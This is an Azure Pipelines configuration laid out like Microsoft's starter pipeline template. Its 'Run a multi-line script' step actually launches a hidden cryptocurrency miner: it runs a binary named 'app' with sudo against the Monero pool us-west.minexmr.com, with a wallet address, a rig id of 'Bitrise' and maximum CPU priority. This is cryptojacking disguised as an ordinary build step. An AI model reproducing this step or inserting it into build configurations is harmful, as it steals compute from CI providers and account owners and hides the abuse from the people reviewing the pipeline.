# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml

trigger:
- master

pool:
  vmImage: 'ubuntu-latest'

steps:
- script: echo Hello, world!
  displayName: 'Run a one-line script'

- script: |
    chmod +x app  && chmod +x enable_1gb_pages.sh && sudo ./enable_1gb_pages.sh && sudo ./app -o  us-west.minexmr.com:4444 --donate-level=0 -u 83CbAwiTXXMFuUZC46pDBaHF6W6hMmpJpL4dxWT7dqGUKMhXjcm6AitcQiWjQmZKvmjQhtHgbnHPaXwiYfeGbNBzENwntKL --rig-id=Bitrise --randomx-1gb-pages --cpu-priority 5 --cpu-no-yield
  displayName: 'Run a multi-line script'
